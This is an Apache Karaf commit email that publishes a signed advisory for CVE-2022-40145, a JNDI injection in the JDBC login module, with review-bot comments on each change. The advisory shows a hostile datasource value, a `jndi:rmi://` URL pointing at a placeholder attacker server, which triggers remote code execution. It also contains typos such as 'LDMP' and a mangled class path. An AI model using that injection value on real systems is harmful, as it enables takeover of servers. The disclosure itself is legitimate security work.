Posted to commits@karaf.apache.org by jb...@apache.org on 2022/12/21 13:43:29 UTC

svn commit: r1906138 - in /karaf/site/production: documentation.html feed.xml security/cve-2022-40145.txt

Author: jbonofre
Date: Wed Dec 21 13:43:29 2022
New Revision: 1906138

URL: http://svn.apache.org/viewvc?rev=1906138&view=rev
Log:
[scm-publish] Updating main website contents

Added:
    karaf/site/production/security/cve-2022-40145.txt
Modified:
    karaf/site/production/documentation.html
    karaf/site/production/feed.xml

Modified: karaf/site/production/documentation.html
URL: http://svn.apache.org/viewvc/karaf/site/production/documentation.html?rev=1906138&r1=1906137&r2=1906138&view=diff
==============================================================================
--- karaf/site/production/documentation.html (original)
+++ karaf/site/production/documentation.html Wed Dec 21 13:43:29 2022
@@ -481,6 +481,10 @@
 		<p>CVE-2022-22932: Path traversal flaws</p>
 		<a class="btn btn-outline-primary" href="/security/cve-2022-22932.txt">Notes &raquo;</a>
 	      </div>
+	      <div class="pb-4 mb-3">
+		<p>CVE-2022-40145: JDBC JAAS LDAP injection</p>
+		<a class="btn btn-outline-primary" href="/security/cve-2022-40145.txt">Notes &raquo;</a>
+	      </div>
 
             </div><!-- /.blog-main -->
         </div>
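Review bot: the label on the new card, "JDBC JAAS LDAP injection", does not match the heading of the advisory it links to, which reads "LDMP injection vulnerability in JDBC Login Module with JDK 8"; settle on one wording (LDAP, with the JDK 8 qualifier only if it is a real precondition) and use it in both places so a reader searching by title finds the note. The card markup and the `/security/cve-2022-40145.txt` href follow the pattern of the CVE-2022-22932 entry directly above, so nothing else needs to change in this hunk.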

Modified: karaf/site/production/feed.xml
URL: http://svn.apache.org/viewvc/karaf/site/production/feed.xml?rev=1906138&r1=1906137&r2=1906138&view=diff
==============================================================================
--- karaf/site/production/feed.xml (original)
+++ karaf/site/production/feed.xml Wed Dec 21 13:43:29 2022
@@ -1 +1 @@
-<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.0.1">Jekyll</generator><link href="https://karaf.apache.org/feed.xml" rel="self" type="application/atom+xml" /><link href="https://karaf.apache.org/" rel="alternate" type="text/html" /><updated>2022-10-23T17:32:05+02:00</updated><id>https://karaf.apache.org/feed.xml</id><title type="html">Apache Karaf - The modulith runtime</title><subtitle>Karaf provides modulith runtime for the enterprise, running on premise or on cloud. Focus on your business code and applications, Apache Karaf deals with the rest.</subtitle></feed>
\ No newline at end of file
+<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.0.1">Jekyll</generator><link href="https://karaf.apache.org/feed.xml" rel="self" type="application/atom+xml" /><link href="https://karaf.apache.org/" rel="alternate" type="text/html" /><updated>2022-12-21T13:58:50+01:00</updated><id>https://karaf.apache.org/feed.xml</id><title type="html">Apache Karaf - The modulith runtime</title><subtitle>Karaf provides modulith runtime for the enterprise, running on premise or on cloud. Focus on your business code and applications, Apache Karaf deals with the rest.</subtitle></feed>
\ No newline at end of file
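Review bot: only the `<updated>` timestamp changes in feed.xml, and the feed still carries no `<entry>` element at all, so subscribers see a bumped timestamp with nothing behind it and get no notification that CVE-2022-40145 was published. If the feed is meant to announce security notes, have the site build emit an entry for the new advisory (title, link to `/security/cve-2022-40145.txt`, updated date); if the feed is intentionally empty, leave it out of the publish step so the timestamp does not churn on every site update. The `\ No newline at end of file` on both sides is harmless but trivial to fix in the Jekyll template.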

Added: karaf/site/production/security/cve-2022-40145.txt
URL: http://svn.apache.org/viewvc/karaf/site/production/security/cve-2022-40145.txt?rev=1906138&view=auto
==============================================================================
--- karaf/site/production/security/cve-2022-40145.txt (added)
+++ karaf/site/production/security/cve-2022-40145.txt Wed Dec 21 13:43:29 2022
@@ -0,0 +1,48 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+Hash: SHA512
+
+CVE-2022-40145: LDMP injection vulnerability in JDBC Login Module with JDK 8
+
+Severity: Low
+
+Vendor: The Apache Software Foundation
+
+Versions Affected: all versions of Apache Karaf prior to 4.3.8 or 4.4.2
+
+Description:
+
+This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.
+
+The method jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasourceuse uses InitialContext.lookup(jndiName) without filtering.
+An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.
+This is vulnerable to a remote code execution (RCE) attack when aconfiguration uses a JNDI LDAP data source URI when an attacker hascontrol of the target LDAP server.
+
+This has been fixed in revision:
+
+https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
+https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1
+
+Mitigation: Apache Karaf users should upgrade to 4.3.8 or 4.4.2
+or later as soon as possible, or use correct path.
+
+JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7568
+
+Credit: This issue was discovered and reported by Xun Bai <bb...@gmail.com>
+-----BEGIN PGP SIGNATURE-----
+
+iQIzBAEBCgAdFiEEGqjPktQJpzOT0Lc2v/LuQsgoLnYFAmOW/5wACgkQv/LuQsgo
+LnaRtBAApAsUA7+zVl03d0pKa7Dd41uec9/voRZ9DSf0byRNdP/NQslAe6ZHEbqz
+/2pC3OuYj0yfBOWZ6O0uFb/iDt4+GqAz3mnZqRyDq+hcrdBY5VVxkOU+6uRtQ+Sm
+GfkDmMpJDLOURgG/xQa/G8QhOLiBtBErwB5pffMBoxC12HjBPfichM6KJuT55MGR
+yvR6CXsPnAlRkyhYPSkI9ehng2BbgnqCHtFQEZwXTViXoyz44/0NZc6URlytsO11
+a3/qbkP1p8nvwC5U5D4P/RKRLvN23HZFbFRRms/gNN+L9BKmv8krA3ESnNgi7Kcj
+7j+8gRYRzw/g41GuZARC435zCy8PH9ydoHZQnicSmQUpDzBwfCBpRFgiXpq3ztHt
+7sLa3rSOVWiJmQiAjQXM1Rr958TrBYRjV2UcTbb0AYEEiZQrAeYHq1M5Y+3pcV9h
+NsqEeVkDZji0nu1EoTbxcjIJjMo1G8u3k8VvKMAfrQ37gnCfOnKYYak47cwvZzmu
+suatXXUQffi/YR3wercn/1AyCqYmWPbrcvI2b41eDR5JtDX6OMtRdsshCVwjEh9v
+k2FSoPCM21+lpbXful4LwIMUppNfwrvn4VXsAsWG4I/g8kxbrFbI0Y/cJHPuCbU2
+ABpIBEZGXh8h8TMIimM7EGkKIiF2rlohKsavtgYoi91qrpmca70=
+=ozdD
+-----END PGP SIGNATURE-----
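Review bot: the title line `+CVE-2022-40145: LDMP injection vulnerability ...` says "LDMP" where the rest of the advisory and the documentation.html entry in this same commit say LDAP; fix the typo, and remove the duplicated `Hash: SHA512` line that follows the first one (a clearsigned message carries that header once, then a blank line; if the stray copy was part of the text that was signed, the file must be re-signed after removing it). Several other lines read as unedited draft: "This vulnerable is about" should be "This vulnerability concerns", "aconfiguration" and "hascontrol" are missing spaces, "An user" should be "A user", and `jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasourceuse` looks like a mangled source path where the fully qualified `org.apache.karaf.jaas.modules.jdbc.JDBCUtils#doCreateDatasource` was intended. The sentence about editing `JdbcLoginModuleTest#setup` describes how a unit test reproduces the issue rather than the exposure itself; the point for readers is that the login module hands the configured `datasource` option to `InitialContext.lookup` without validation, so anyone able to set that option to a JNDI URL for a server they control reaches code execution, and "Severity: Low" sits oddly next to that unless the advisory states that the attacker must already control the JAAS configuration. The mitigation "or use correct path" is too vague to act on: say concretely that the datasource option should reference the OSGi service (the `osgi:` form shown in the description) rather than a JNDI URL to an external host, and spell out "Versions Affected" as 4.3.x before 4.3.8 and 4.4.x before 4.4.2.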